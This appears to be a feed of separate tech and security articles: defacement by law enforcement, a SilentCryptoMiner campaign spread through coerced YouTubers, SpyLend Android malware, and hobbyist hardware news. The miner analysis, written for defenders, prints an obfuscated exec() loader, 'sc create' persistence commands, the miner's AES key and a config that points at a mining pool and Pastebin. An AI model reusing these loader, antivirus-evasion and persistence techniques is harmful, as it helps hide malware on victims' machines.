Le forze dell’ordine hanno iniziato a utilizzare il defacing come una strategia per dimostrare la compromissione delle infrastrutture informatiche di gruppi criminali, mostrando così la loro capacità di infiltrarsi nelle reti di attori malevoli. Un esempio significativo di questo approccio è l’operazione Cronos, un’azione internazionale contro il gruppo ransomware LockBit. Durante questa operazione, le autorità hanno preso il controllo dei sistemi utilizzati da LockBit per pubblicare i dati delle aziende violate e hanno effettuato il deface di alcuni dei loro siti web. Inoltre hanno utilizzato la tecnica del countdown (tipico delle cybergang ransomware) per mostrare informazioni inedite relativamente a LockBit e ai suoi affiliati.
Data Leak Site di Lockbit “deturpato” dalle forze dell’ordine nell’operazione cronos. (fonte RedHotCyber)
Un altro esempio notevole è stato l’intervento delle forze dell’ordine contro il noto marketplace del dark web Genesis Market, un sito utilizzato per la vendita di credenziali rubate e dati personali. Dopo aver smantellato il mercato, le autorità hanno sostituito il sito web con una pagina che notificava l’arresto e la rimozione della piattaforma.
Questa operazione non solo ha interrotto l’attività illegale nel clear web, ma ha anche servito a mostrare in modo visibile l’efficacia delle indagini e delle operazioni cyber nel disarticolare le reti criminali. Il defacing, in questo caso, è stato uno strumento di dimostrazione pubblica del successo delle forze dell’ordine nella lotta contro il crimine informatico.
Deface di Genesis Market alla quale chiusura ha partecipato anche la nostra Polizia Postale (Fonte RedHotCyber)
L’uso di tali tattiche da parte delle forze dell’ordine evidenzia il crescente impiego di operazioni di hacking legittimo per contrastare e smantellare le infrastrutture criminali, un approccio che potrebbe diventare sempre più comune nelle operazioni contro il crimine cibernetico.
Conclusione
Il defacement, nato come una semplice forma di protesta digitale, si è trasformato in uno strumento sofisticato per condurre psyops e guerra cibernetica e manipolazione delle informazioni. Mentre gli hacktivisti veri continuano a utilizzarlo per denunciare ingiustizie, gli attori statali – sotto doppia maschera – ingaggiano gruppi di cyber criminali mercenari integrando tali operazioni in strategie di cyber war.
Comprendere le dinamiche dietro questi attacchi è essenziale per difendersi e per anticipare le mosse di chi sfrutta il cyberspazio per fini politici e strategici.
La battaglia per la sicurezza digitale è appena iniziata, e il ruolo del defacement e del DDoS sta cambiando, e questo scenario continuerà a evolversi.
L'articolo Alla Scoperta dei Deface: tra Hacktivismo Cibernetico, Psy-Ops e Cyber Warfare proviene da il blog della sicurezza informatica.
Undercover miner: how YouTubers get pressed into distributing SilentCryptoMiner as a restriction bypass tool
In recent months, we’ve seen an increase in the use of Windows Packet Divert drivers to intercept and modify network traffic in Windows systems. This technology is used in various utilities, including ones for bypassing blocks and restrictions of access to resources worldwide. Over the past six months, our systems have logged more than 2.4 million detections of such drivers on user devices.
Dynamics of Windows Packet Divert detections (download)
The growing popularity of tools using Windows Packet Divert has attracted cybercriminals. They started distributing malware under the guise of restriction bypass programs and injecting malicious code into existing programs.
Such software is often distributed in the form of archives with text installation instructions, in which the developers recommend disabling security solutions, citing false positives. This plays into the hands of attackers by allowing them to persist in an unprotected system without the risk of detection. Most active of all have been schemes for distributing popular stealers, remote access tools (RATs), Trojans that provide hidden remote access, and miners that harness computing power to mine cryptocurrency. The most commonly used malware families were NJRat, XWorm, Phemedrone and DCRat.
Blackmail as a new infection scheme
We recently uncovered a mass malware campaign infecting users with a miner disguised as a tool for bypassing blocks based on deep packet inspection (DPI). The original version of the tool is published on GitHub, where it has been starred more than 10,000 times. There is also a separate project based on it that is used to access Discord and YouTube.
According to our telemetry, the malware campaign has affected more than 2,000 victims in Russia, but the overall figure could be much higher. One of the infection channels was a YouTuber with 60,000 subscribers, who posted several videos with instructions for bypassing blocks, adding a link to a malicious archive in the description. These videos have reached more than 400,000 views. The description was later edited and the link replaced with the message “program does not work”.
The link pointed to the malicious site
gitrok[.]com, which hosted the infected archive. The counter at the time of posting the video showed more than 40,000 downloads.
Later, in discussions in the tool’s original repository, we found messages about a new distribution scheme: attackers under the guise of the tool developers sent strikes about the videos with instructions for bypassing restrictions. Next, the attackers threatened the content creators under the pretext of copyright infringement, demanding that they post videos with malicious links or risk shutdown of their YouTube channels.
Translation:
Hi, I have a question about YouTube strikes on the use of open-source code from the repository [REDACTED].
I created a tutorial video using materials from this repository, since it was publicly available on GitHub, and the video was non-commercial. But I still got hit with a YouTube strike for demonstrating the code.
I’d like to know if it’s the authors themselves or someone on their behalf who send the strikes? Or is it just a misunderstanding?
This way, the scammers were able to manipulate the reputation of popular YouTubers to force them to post links to infected files.
Example of a fraudulent message asking a YouTuber to post a link to a malicious site
Translation:
Official website: gitrok.com
All traffic should be now directed strictly to this site. GitHub remains solely a repository for developers.
If you have social networks where you’ve advertised [REDACTED], please publish a new post with a mention of our official website, and note that you can now download [REDACTED] only from there.
YouTuber complaints about cybercriminal activity
Translation:
Dear program developer @[REDACTED] YouTubers who showed how the program works and helped people unblock YouTube in Russia are having problems with scammers handing out strikes and threatening to delete these creators’ channels. They force you to shoot 2 more videos for your channel so that if anything happens they can send 2 more strikes, then it’s 3 strikes and you’re out – Google will delete the channel. YouTubers feel pressured to give in to the scammers’ demands to save their channels. But that only makes things worse.
SCAMMERS FORCE YOUTUBERS TO SHOOT VIDEOS OF THEIR PROGRAM, THAT’S WHY I DON’T HAVE A SINGLE YOUTUBE VIDEO OF THIS PROGRAM…
In addition, we found a Telegram channel actively distributing the malicious build and a video tutorial on a YouTube channel with 340,000 subscribers.
And in December 2024, users reported the distribution of a miner-infected version of the same tool through other Telegram and YouTube channels, which have since been shut down.
Infected archive
All the discovered infected archives contained one additional executable file, while the original start script
general.bat had been modified to run this file using PowerShell. In one version, if the security solution on the victim’s device deleted the malicious file, the modified start script displayed the message “File not found, disable all antiviruses and re-download the file, that will help!” to persuade the victim to run the malicious file, bypassing protection:
Contents of the original (left) and modified (right) general.bat start script
The malicious executable is a simple loader written in Python and packed into an executable application using PyInstaller. In some cases, the script has been additionally obfuscated using the PyArmor library.
import os
import subprocess
import sys
import ctypes
import base64
import tempfile
import urllib.request as urllib
import datetime
import time
import psutil
import base64
import binascii
cmb8F2SLqf1 = '595663786432497a536a424...335331453950513d3d'
decoded_hex = bytes.fromhex(cmb8F2SLqf1).decode()
step1 = base64.b64decode(decoded_hex).decode()
exec(base64.b64decode(step1).decode())
Example of the unpacked loader
The loader retrieves the URL of the next-stage payload from a hardcoded path on one of two domains:
canvas[.]pet or swapme[.]fun. After the download, it saves the payload named t.py in a temporary directory and runs it.
Note that the payload can be downloaded only from Russian IP addresses, indicating that the malware campaign was aimed at users in Russia.
Second-stage malware loader
The next stage of the infection chain was a custom Python loader based on open-source code snippets. Below are the execution steps for this script:
- Scanning the current environment for artifacts of running on a virtual machine or in a sandbox. The loader compares system data (computer and user names, MAC addresses, unique disk identifiers (HWID), GPU parameters, etc.) with predefined lists of values used by virtual environments.
- Adding the AppData directory to Microsoft Defender exclusions.
- GET request to 193.233.203[.]138/WjEjoHCj/t. Depending on the response (true/false) and the specified probability, the script either downloads the executable file from the server at http://9x9o[.]com/q.txt, or uses a hardcoded block of data in Base64 format. The resulting file is saved at %LocalAppData%\driverpatch9t1ohxw8\di.exe.
- Modifying the payload. The executable file just written to disk is modified by appending random blocks of data to the end until it reaches 690 MB in size. This technique is used to hinder automatic analysis by antivirus solutions and sandboxes.
- Gaining persistence in the system. The loader creates a service named DrvSvc and sets its description to that of the legitimate Windows Image Acquisition (WIA) service:
svc_name = "DrvSvc"
svc_desc = "Launches applications associated with still image acquisition events."
cmd_create = f'sc create {svc_name} binPath= "{exe_path}" start= auto'
cmd_desc = f'sc description {svc_name} "{svc_desc}"'
SilentCryptoMiner
The downloaded
di.exe is a SilentCryptoMiner sample based on the open-source miner XMRig. This is a covert miner able to mine multiple cryptocurrencies (ETH, ETC, XMR, RTM and others) using various algorithms. For stealth, SilentCryptoMiner employs process hollowing to inject the miner code into a system process (in this case, dwm.exe). The malware is able to stop mining while the processes specified in the configuration are active. It can be controlled remotely via a web panel. The miner is coded to scan for indicators of running in a virtual environment and check the size of the executable itself, which must be at least 680 MB and no more than 800 MB – this is how the attackers make sure that the miner was run by the above-described loader.
The miner configuration is Base64-encoded and encrypted using the AES-CBC algorithm with the key
UXUUXUUXUUCommandULineUUXUUXUUXU and the initialization vector UUCommandULineUU. It has many parameters, including: the algorithm and URL for mining; a list of programs which upon execution cause the miner to temporarily stop and free its resources; a link to the remote configuration that the miner will receive every 100 minutes.--algo=rx/0 --url=150.241.93[.]90:443 --user="JAN2024" --pass="JAN2024" --cpu-
max-threads-hint=20 --cinit-remote-config="https://pastebin.com/raw/kDDLXFac" --
cinit-stealth-
targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --
cinit-version="3.2.0" --tls --cinit-idle-wait=4 --cinit-idle-cpu=30 --cinit-
id="uvduaauhlrqdhmpj"
The campaign makes use of the Pastebin service to store configuration files. We detected several accounts distributing such files.
Takeaways
The topic of restriction bypass tools is being actively exploited to distribute malware. The above campaign limited itself to distributing a miner, but threat actors could start to use this vector for more complex attacks, including data theft and downloading other malware. This underscores once again that, while such tools may look enticing, they pose a serious threat to user data security.
Indicators of compromise
Infected archives
574ed9859fcdcc060e912cb2a8d1142c
91b7cfd1f9f08c24e17d730233b80d5f
PyInstaller loaders
9808b8430667f896bcc0cb132057a683
0c380d648c0c4b65ff66269e331a0f00
Malicious Python scripts
1f52ec40d3120014bb9c6858e3ba907f
a14794984c8f8ab03b21890ecd7b89cb
SilentCryptoMiner
a2a9eeb3113a3e6958836e8226a8f78f
5c5c617b53f388176173768ae19952e8
ac5cb1c0be04e68c7aee9a4348b37195
Malicious domains and IPs
hxxp://gitrok[.]com
hxxp://swapme[.]fun
hxxp://canvas[.]pet
hxxp://9x9o[.]com
193.233.203[.]138
150.241.93[.]90
Speaking Computers from the 1970s
Talking computers are nothing these days. But in the old days, a computer that could speak was quite the novelty. Many computers from the 1970s and 1980s used an AY-3-8910 chip and [InazumaDenki] has been playing with one of these venerable chips. You can see (and hear) the results in the video below.
The chip uses PCM, and there are different ways to store and play sounds. The video shows how different they are and even looks at the output on the oscilloscope. The chip has three voices and was produced by General Instruments, the company that initially made PIC microcontrollers. It found its way into many classic arcade games, home computers, and games like Intellivision, Vectrex, the MSX, and ZX Spectrum. Soundcards for the TRS-80 Color Computer and the Apple II used these chips. The Atari ST used a variant from Yamaha, the YM2149F.
There’s some code for an ATmega, and the video says it is part one, so we expect to see more videos on this chip soon.
General instruments had other speech chips and some of them are still around in emulated form. In fact, you can emulate the AY-3-8910 with little more than a Raspberry Pi Pico.
youtube.com/embed/EJkdTjGpREg?…
Attenti a SpyLend: Il Malware Android con 100.000 Download su Google Play!
Gli analisti di Cyfirma hanno scoperto che un malware per Android chiamato SpyLend si è infiltrato nello store ufficiale di Google Play ed è stato scaricato più di 100.000 volte. Il malware era camuffato da strumento finanziario ed è stato utilizzato in India per erogare prestiti nell’ambito del programma SpyLoan.
I malware di tipo SpyLoan solitamente si mascherano da strumenti finanziari o servizi di credito legittimi, attraverso i quali agli utenti vengono offerti prestiti con approvazione rapida, ma le condizioni di tali prestiti sono spesso molto fuorvianti o semplicemente false. Inoltre, le app rubano dati dai dispositivi delle vittime per utilizzarli in seguito a fini di ricatto.
Inoltre, le app SpyLoan richiedono sempre privilegi eccessivi sul dispositivo, tra cui: il permesso di utilizzare la fotocamera (presumibilmente per caricare foto KYC), l’accesso al calendario, ai contatti, agli SMS, alla posizione, ai dati dei sensori e così via. Di conseguenza, gli operatori di tali applicazioni possono rubare dati riservati dal dispositivo e utilizzarli a scopo di ricatto, per poi costringere la vittima a pagare.
I ricercatori di Cyfirma hanno scoperto nell’app store ufficiale un’app chiamata Finance Simplified, che è stata scaricata oltre 100.000 volte e che si vanta di essere uno strumento di gestione finanziaria.
Secondo gli esperti, in alcuni Paesi come l’India, l’applicazione mostra un comportamento dannoso e ruba dati dai dispositivi degli utenti. Inoltre, sono stati scoperti altri APK dannosi che sembrano essere varianti della stessa campagna malware: KreditApple, PokketMe e StashFur.
Sebbene l’app sia già stata rimossa da Google Play, potrebbe continuare a essere eseguita in background, raccogliendo informazioni sensibili dai dispositivi infetti, tra cui:
- contatti, registri delle chiamate, messaggi SMS e dati del dispositivo;
- foto, video e documenti da memorie interne ed esterne;
- Posizione in tempo reale della vittima (aggiornata ogni 3 secondi), cronologia delle posizioni e indirizzo IP;
- le ultime 20 voci di testo copiate negli appunti;
- cronologia creditizia e messaggi SMS sulle transazioni bancarie.
Numerose recensioni degli utenti di Finance Simplified su Google Play indicano che l’app offriva servizi di prestito e poi i suoi gestori cercavano di estorcere denaro ai mutuatari se si rifiutavano di pagare alti tassi di interesse.
Sebbene i dati sopra elencati siano stati utilizzati principalmente per estorcere denaro alle persone che hanno corso il rischio di contrarre un prestito tramite Finance Simplified, potrebbero anche essere utilizzati per frodi finanziarie o rivenduti a criminali informatici.
Per evitare di essere individuato su Google Play, Finance Simplified ha utilizzato una WebView per reindirizzare gli utenti a un sito esterno, dove hanno scaricato l’APK dei prestiti ospitato su Amazon EC2. Si noti che l’applicazione scaricava un APK aggiuntivo solo se l’utente si trovava in India.
L'articolo Attenti a SpyLend: Il Malware Android con 100.000 Download su Google Play! proviene da il blog della sicurezza informatica.
Build a Parametric Speaker of Your Own
The loudspeaker on your home entertainment equipment is designed to project audio around the space in which it operates, if it’s not omnidirectional as such it can feel that way as the surroundings reflect the sound to you wherever you are. Making a directional speaker to project sound over a long distance is considerably more difficult than making one similar to your home speaker, and [Orange_Murker] is here with a solution. At the recent Hacker Hotel conference in the Netherlands, she presented an ultrasonic parametric speaker. It projects an extremely narrow beam of sound over a significant distance, but it’s not an audio frequency speaker at all.
Those of you familiar with radio will recognize its operation; an ultrasonic carrier is modulated with the audio to be projected, and the speaker transfers that to the air. Just like the diode detector in an old AM radio, air is a nonlinear medium, and it performs a demodulation of the ultrasound to produce an audio frequency that can be heard. She spends a while going into modulation schemes, before revealing that she drove her speaker with a 40 kHz PWM via an H bridge. The speaker itself is an array of in-phase ultrasonic transducers, and she demonstrates the result on her audience.
This project is surprisingly simple, should you wish to have a go yourself. There’s a video below the break, and she’s put all the files in a GitHub repository. Meanwhile this isn’t the first time we’ve seen a project like this.
media.ccc.de/v/2025-201-build-…
Smartwatches Could Flatten the Curve of the Next Pandemic
While we’d like to think that pandemics and lockdowns are behind us, the reality is that a warming climate and the fast-paced travel of modern life are a perfect storm for nasty viruses. One thing that could help us curb the spread of the next pandemic may already be on your wrist.
Researchers at Aalto University, Stanford University, and Texas A&M have found that the illness detection features common to modern smartwatches are advanced enough to help people make the call to stay home or mask up and avoid getting others sick. They note we’re already at 88% accuracy for early detection of COVID-19 and 90% for the flu. Combining data from a number of other studies on smartwatch accuracy, epidemiology, behavior, and biology, the researchers were able to model the possible outcomes of this early detection on the spread of future diseases.
“Even just a 66-75 percent reduction in social contacts soon after detection by smartwatches — keeping in mind that that’s on a par with what you’d normally do if you had cold symptoms — can lead to a 40-65 percent decrease in disease transmission compared to someone isolating from the onset of symptoms,” says Märt Vesinurm.
We’ve got you covered if you’re looking for a smartwatch that looks a bit like a hospital wristband and we’ve also covered one that’s alive. That way, you’ll have a slimy friend when you’re avoiding other humans this time around. And when it’s time to develop a vaccine for whatever new bug is after us, how do MRNA vaccines work anyway?
Shortwave Resurrection: A Sticky Switch Fix on a Hallicrafters
Shortwave radio has a charm all its own: part history, part mystery, and a whole lot of tech nostalgia. The Hallicrafters S-53A is a prime example of mid-century engineering, but when you get your hands on one, chances are it won’t be in mint condition. Which was exactly the case for this restoration project by [Ken’s Lab], where the biggest challenge wasn’t fried capacitors or burned-out tubes, but a stubborn band selector switch that refused to budge.
What made it come to this point? The answer is: time, oxidation, and old-school metal tolerances. Instead of forcing it (and risking a very bad day), [Ken]’s repair involved careful disassembly, a strategic application of lubricant, and a bit of patience. As the switch started to free up, another pleasant surprise emerged: all the tubes were original Hallicrafters stock. A rare find, and a solid reason to get this radio working without unnecessary modifications. Because some day, owning a shortwave radio could be a good decision.
Once powered up, the receiver sprang to life, picking up shortwave stations loud and clear. Hallicrafters’ legendary durability proved itself once before, in this fix that we covered last year. It’s a reminder that sometimes, the best repairs aren’t about drastic changes, but small, well-placed fixes.
What golden oldie did you manage to fix up?
youtube.com/embed/Nx8Mq9OCoRo?…
Interposer Helps GPS Receiver Overcome Its Age
We return to [Tom Verbeure] hacking on Symmetricom GPS receivers. This time, the problem’s more complicated, but the solution remains the same – hardware hacking. If you recall, the previous frontier was active antenna voltage compatibility – now, it’s rollover. See, the GPS receiver chip has its internal rollover date set to 18th of September 2022. We’ve passed this date a while back, but the receiver’s firmware isn’t new enough to know how to handle this. What to do? Build an interposer, of course.
You can bring the by sending some extra init commands to the GPS chipset during bootup, and, firmware hacking just wasn’t the route. An RP2040 board, a custom PCB, a few semi-bespoke connectors, and a few zero-ohm resistors was all it took to make this work. From there, a MITM firmware wakes up, sends the extra commands during power-on, and passes all the other traffic right through – the system suspects nothing.
Everything is open-source, as we could expect. The problem’s been solved, and, as a bonus, this implant gives a workaround path for any future bugs we might encounter as far as GPS chipset-to-receiver comms are concerned. Now, the revived S200 serves [Tom] in his hacking journeys, and we’re reminded that interposers remain a viable way to work around firmware bugs. Also, if the firmware (or the CPU) is way too old to work with, an interposer is a great first step to removing it out of the equation completely.
Inexpensive Powder Coating
[Pete] had a friend who would powder coat metal parts for him, but when he needed 16 metal parts coated, he decided he needed to develop a way to do it himself. Some research turned up the fluid bed method and he decided to go that route. He 3D printed a holder and you can see how it all turned out in the video below.
A coffee filter holds the powder in place. The powder is “fluidized” by airflow, which, in this case, comes from an aquarium pump. The first few designs didn’t work out well. Eventually, though, he had a successful fluid bed. You preheat the part so the powder will stick and then, as usual, bake the part in an oven to cure the powder. You can expect to spend some time getting everything just right. [Pete] had to divert airflow and adjust the flow rate to get everything to work right.
With conventional powder coating, you usually charge the piece you want to coat, but that’s not necessary here. You could try a few other things as suggested in the video comments: some suggested ditching the coffee filter, while others think agitating the powder would make a difference. Let us know what you find out.
This seems neater than the powder coating guns we’ve seen. Of course, these wheels had a great shape for powder coating, but sometimes it is more challenging.
youtube.com/embed/Kh5TEMo2bdc?…
Keebin’ with Kristina: the One with the Schreibmaschine
Image by [Sasha K.] via redditRemember that lovely Hacktric centerfold from a couple Keebins ago with the Selectric keycaps? Yeah you do. Well, so does [Sasha K.], who saw the original reddit post and got inspired. [Sasha K.] has more than one IBM Selectric lying around, which is a nice problem to have, and decided to strip one of its keycaps and get to experimenting.
The result is a nice adapter that allows them to be used with Kailh chocs — you can find the file on Thingiverse, and check out the video after the break to see how they sound on a set of clicky white chocs.
Those white chocs are attached to a ThumbsUp! v8 keyboard, a line that [Sasha K.] designed. His daily driver boards are on v9 and v10, but the caps were getting jammed up because of the spacing on those. So instead, he used v8 which has Cherry MX spacing but also supports chocs.
As you can see, there is not much to the adapter, which essentially plugs the Selectric keycap’s slot and splits the force into the electrical outlet-style pair of holes that chocs bear This feels like an easier problem to solve than making an adapter for MX-style switches. What do you think?
youtube.com/embed/5UlwyUif-mc?…
Desk-Mounted Macro Pad Does Not Control Desk Height
Image by [CloffWrangler] via redditBut it sure is a nice-looking first design, isn’t it? Especially with that colorway and the ISO Return. Mmm. Reminds me of the Data General Dasher, and for good reason — those are Drop’s Dasher key caps.
So why the number scheme? It means nothing more than that it is representative of the keycaps that [CloffWrangler] had lying around. They are currently used for volume control, toggling mic and webcam in Zoom, and some other stuff that [CloffWrangler] hasn’t landed on just yet.
This hand-wired, 3D-printed beauty is ruled by a Raspberry Pi Pico and contains Gateron Oil Kings switches. I sure would like to have something similar, but I think I would hit it with my chair quite a bit unless I put it way over there to the right or something. But then I wonder, would it be as useful? If it were at arm’s length, I might be tempted to rotate the thing 90° to the right so it wouldn’t be awkward to use.
The Centerfold: A Cat Person Lives Here
Image by [moobel] via redditDon’t these friendly keycaps look nice and soft? Apparently they’re not, according to [moobel]. That’s unfortunate. But they do feel nice to type on nonetheless.
So, that’s not too many keys, is it? That’s because this isn’t technically a keyboard. It’s a pair of Taipo keyboards, which are meant for to be used to chord with either one or both hands. I really appreciate that [moobel] discovered the Taipo and decided to make a pair in order to learn the layout.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: Der Kanzler
Image by [DonaldDutchie] via redditHow quickly can you type on a typewriter? To a certain extent, it depends on the machine. Der Kanzler Schreibmaschine was a fine piece of German engineering that allowed one to type quickly for an interesting reason: it could print 88 characters using only 11 type bars with 8 characters each.
How did that work? Well, each key changed the position of the linkages, moving the slug either up or down. The top row articulates the deepest, while the home row doesn’t move at all. Makes sense.
The Kanzler was designed by Paul Gruetzmann, and the Kanzler model 1B shown here hit the market in 1903. With the Kanzler line, Gruetzmann was trying to produce a machine that was faster and more stable than others. The company claimed that 200 WPM was technically achievable. Can you imagine typing that fast on your best day, on your favorite keyboard? No chording allowed! 😛
Finally, Some 3D-Printed keycaps for the Kinesis Advantage
If you’re a Kinesis Advantage owner, one of the first things you notice is that you might not really like the ABS keycaps and will probably want something different. But then you find out that although you can get fun keycap sets in ergo layouts, they’re never gonna be contoured like the factory set, and that’s something you’ll have to get used to that, in my opinion, degrades the Kinesis experience. Right now, it seems like the best option is to just print your own.
Image by [SimplifyAndAddCoffee] via redditAnd here are the files. If you’re wondering about E, that is the original Maltron layout where this whole idea of the concave curvy girl got its start.
According to [SimplifyAndAddCoffee], these lovely keycaps were printed in Siraya Tech Blue Obsidian Black resin on an MSLA printer.
After printing, those inset legends were filled with white epoxy putty. [SimplifyAndAddCoffee] then scraped away the excess and completed the process by wiping them all with an isopropyl alcohol-soaked rag.
Personally, I suffer with the original ABS caps on my daily driver Kinesis, but my go-somewhere board has blank PBT caps for ultimate intrigue. I’d love to have a set of printed ones, but I’d have to have them made somewhere since I don’t have any type of resin printer around.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
DK 9x20 - Fuggire dal cloud
C'è un'alternativa al cloud USA, ora che tutti scoprono che non sono alleati né affidabili? Sì? No? La risposta giusta è no. Ma è la domanda che è sbagliata.
spreaker.com/episode/dk-9x20-f…
It’s 2025, and Here’s a New Film Format
We love camera hacking here at Hackaday, and it’s always fascinating to see new things being done in photography. Something rather special has come our way from [Camerdactyl], who hasn’t merely made a camera, instead he’s created an entirely new analogue film format. Move over 35mm and 120, here’s the RA-4 cartridge!
RA-4 is the colour print chemistry many of you will be familiar with from your holiday snaps back in the day. Normally a negative image is projected onto it from the negative your camera took, and the positive image is developed on the paper as the reverse of that. It can also be developed as a reversal process similar to slide film, in which the negative image is developed and bleached away leaving an unexposed positive image, which can then be exposed to light and developed to reveal a picture. This means that with carefully chosen colour correction filters it can be shot in a camera to make normal colour prints with this reversal process.
The new film format is a 3D printed cartridge system holding a long roll of RA-4 paper, which slots into a back for standard 5 by 4 inch cameras. He’s also made a modular developing machine for the process, and can get over 100 shots on a roll. A portion of the video below deals with how he wants to release it; since it has taken a huge amount of development resources he intends to release the files to the public in stages as he reaches sales milestones with his work. It’s an unusual strategy that we hope works for him, though we suspect that many camera hackers would be prepared to pay him directly for the files.
Either way, it’s a reminder that there’s still plenty of fun to be had with analogue film, and also that reversal development of RA-4 is possible. Some of us here at Hackaday have been known to hack a few cameras, we guess it’s another one to add to the “one day” list.
youtube.com/embed/PB0GPYUDBCM?…
Thanks [Chuck] for the tip!
LTA’s Pathfinder 1: the Dawn of a New Age of Airships?
Long before the first airplanes took to the skies, humans had already overcome gravity with the help of airships. Starting with crude hot air balloons, the 18th century saw the development of more practical dirigible airships, including hydrogen gas balloons. On 7 January 1785, French inventor, and pioneer of gas balloon flight Jean-Pierre Blanchard would cross the English Channel in such a hydrogen gas balloon, which took a mere 2.5 hours. Despite the primitive propulsion and steering options available at the time, this provided continued inspiration for new inventors.
With steam engines being too heavy and cumbersome, it wasn’t until the era of internal combustion engines a century later that airships began to develop into practical designs. Until World War 2 it seemed that airships had a bright future ahead of them, but amidst a number of accidents and the rise of practical airplanes, airships found themselves mostly reduced to the not very flashy role of advertising blimps.
Yet despite popular media having declared rigid airships such as the German Zeppelins to be dead and a figment of a historic fevered imagination, new rigid airships are being constructed today, with improvements that would set the hearts of 1930s German and American airship builders aflutter. So what is going on here? Are we about to see these floating giants darken the skies once more?
A Simple Concept
Both balloons and airships are a type of aerostat, meaning an aircraft that is lighter than air and thus capable of sustained buoyancy. Much like a ship or a submarine, it uses this buoyancy to establish equilibrium with the surrounding air and thus maintain its position. In order to change their buoyancy, ships and submarines have ballast tanks, while airships can use mechanisms such as a ballonet. These are air-filled balloons inside the outer balloon which is filled with a lifting gas. Inflating the ballonet with more air or vice versa thus changes the buoyancy of the airship.
In the case of rigid airships like Zeppelins the concept of ballonet is somewhat reversed, in that the outer envelope contains air, while the lifting gas is inside gas bags attached to the upper part. If the rigid airship changes altitude using dynamic lift (i.e. using its propulsion and control surfaces), or by dropping ballast, the air pressure inside this outer envelope drops and the gas bags expand, which reduces the volume of air inside the outer envelope and thus adjusts the buoyancy.
This property makes both non-rigid (i.e. blimps, with ballonets) and rigid airships very stable platforms in most conditions with no real range limit beyond the fuel and food capacity for respectively the engines and onboard crew & passengers.
Why Airships Failed
The main issue with airships is that they are relatively large, and as a result cumbersome to handle, slow when moving, and susceptible to adverse weather conditions. In the list of airship accidents on Wikipedia one can get somewhat of an impression of the issues that airship crews had to deal with. Although there is some overlap with aircraft accidents, unique to airships is their large size which make them susceptible to strong winds and gusts, which can overpower the airship’s controls and cause it to crash.Comparison of the LZ 129 Hindenburg with a number of very large airplanes. (Source: Wikimedia)
Other accidents involved the loss of lifting gas or a conflagration involving hydrogen lifting gas. The fatal accident involving the LZ 129 Hindenburg is probably the event which is most strongly etched onto people’s minds here, although ultimately the cause of what came to be called the Hindenburg disaster was never uncovered. This accident is often marked as ‘the end of the airship era’, although that seems to be rather exaggerated in the light of continued use of airships throughout World War 2 and beyond.
What is undeniably true, however, is that the rise of airplanes during the first half of the 20th century provided strong competition for airships when it came to passenger and cargo transport. Workhorses like the Douglas DC-3 airplane came to define travel by air, while airships saw themselves reduced to mostly military, observational and commercial use where aspects like speed were less important than endurance.
Meanwhile the much smaller and simpler non-rigid blimps were a popular choice for especially stationary applications, ranging from advertising and military monitoring and reconnaissance, to recording platforms for televised sport matches. Effectively airships didn’t go away, they just stopped being Hindenburg-class sized giants.
A Fresh Try
Zeppelin NT D-LZZR during low level flight, 2003 (Credit: Hansueli Krapf, Wikimedia)
Despite this reduced image of airships in people’s minds, the allure of these gentle giants quietly moving through the skies never went away. Beyond flashes of nostalgia and simple tourism, multiple start-ups have or are currently trying to come up with new business models that would reinvigorate the airship industry.
Notable mentions here include the semi-rigid Zeppelin NT, the hybrid Airlander 10, and more recently LTA’s rigid Pathfinder 1, which as the name suggests is a pathfinder airship. Of these the Zeppelin NT is the only one which is currently actively in production and flying. As a semi-rigid airship it doesn’t have the full supportive skeleton as a rigid airship, but instead only has a singular keel. Ballonets are further used as typical with a non-rigid design. So far seven of these have been built, for purposes ranging from tourism, aerial photography, and scientific studies.
The obvious advantage of a semi-rigid design is that it makes disassembling them for transport a lot easier. In comparison a hybrid airship like the Airlander 10 blends the airship design with that of an airplane by adding wings and other design elements which make it in many ways closer to a blended wing design, just with the ability to also float.
Unfortunately for the Airlander 10, it seems to be struggling to enter production since we last looked at it in 2021, with a tentative year of 2028 currently penciled in.
So in this landscape, what is the business model of LTA (Lighter Than Air), a company started and funded by Google co-founder Sergey Brin? As reported most recently by LTA, in October of 2024 they achieved the first untether flight of Pathfinder 1. Construction of Pathfinder 1 incidentally took place at Hangar Two at Moffett airfield, which some people may recognize as one of the filming locations for Mythbuster episodes, and which is a a WW2-era airship hangar.Pathfinder 1 in Hangar 2 at Moffett Airfield. (Credit: LTA)
The rigid Pathfinder 1 uses many new technologies and materials, including titanium hubs and carbon fiber reinforced polymer tubes for the internal frame, LIDAR sensors and an outer skin made of laminated polyvinyl fluoride (PVF, trade name Tedlar). It also uses a landing gear adapted from the Zeppelin NT, with LTA having a working relationship with the company behind that airship.
Finally, it uses 13 helium bags made of ripstop nylon fabric with urethane coating, which should mean that leakage of the lifting gas is significantly less than with Hindenburg-era airships, which were originally designed to use helium as well. The use of titanium and carbon fiber also offer obvious advantages over the duralumin aluminium-copper alloy that was the peak of materials research in the 1930s.
From reading the press releases and the industry commentary to LTA’s efforts it is clear that there’s no clear-cut business model yet, and that Pathfinder 1 along with the upcoming Pathfinder 3 – which will be one-third larger – are pretty much what the name says. As a start-up bankrolled by someone with very deep pockets, the immediate need to attract funding is less severe, which should allow LTA to trial multiple of these prototype airships as they figure out what does and what does not work, also in terms of constructing these massive airships.
Perhaps much like the humble hovercraft which saw itself overhyped last century before seemingly vanishing by the late 90s from public view, there is a niche for even these large rigid airships. Whether this will be in the form of mostly tourist flights, perhaps something akin to cruise ships but in the sky, or something more serious is hard to say.
Who knows, maybe the idea of a flying aircraft carrier like the 1930s-era USS Macon (ZRS-5) will be revived once more, after that humble airship’s impressive list of successes.
Cheap Hackable Smart Ring Gets a Command Line Client
Last year, we’ve featured a super cheap smart ring – BLE, accelerometer, heart sensor, and a battery, all in a tiny package that fits on your finger. Back when we covered it, we expected either reverse-engineering of stock firmware, or development of a custom firmware outright. Now, you might be overjoyed to learn that [Wesley Ellis] has written a Python client for the ring’s stock firmware.
Thanks to lack of any encryption whatsoever, you can simply collect the data from your ring, no pairing necessary, and [Wesley]’s work takes care of the tricky bits. So, if you want to start collecting data from this ring right now, integrate it into anything you want, such as your smart home or exoskeleton project, this client is enough. A few firmware secrets remain – for instance, the specific way that the ring keep track of day phases, or SPO2 intricacies. But there’s certainly enough here for you to get started with.
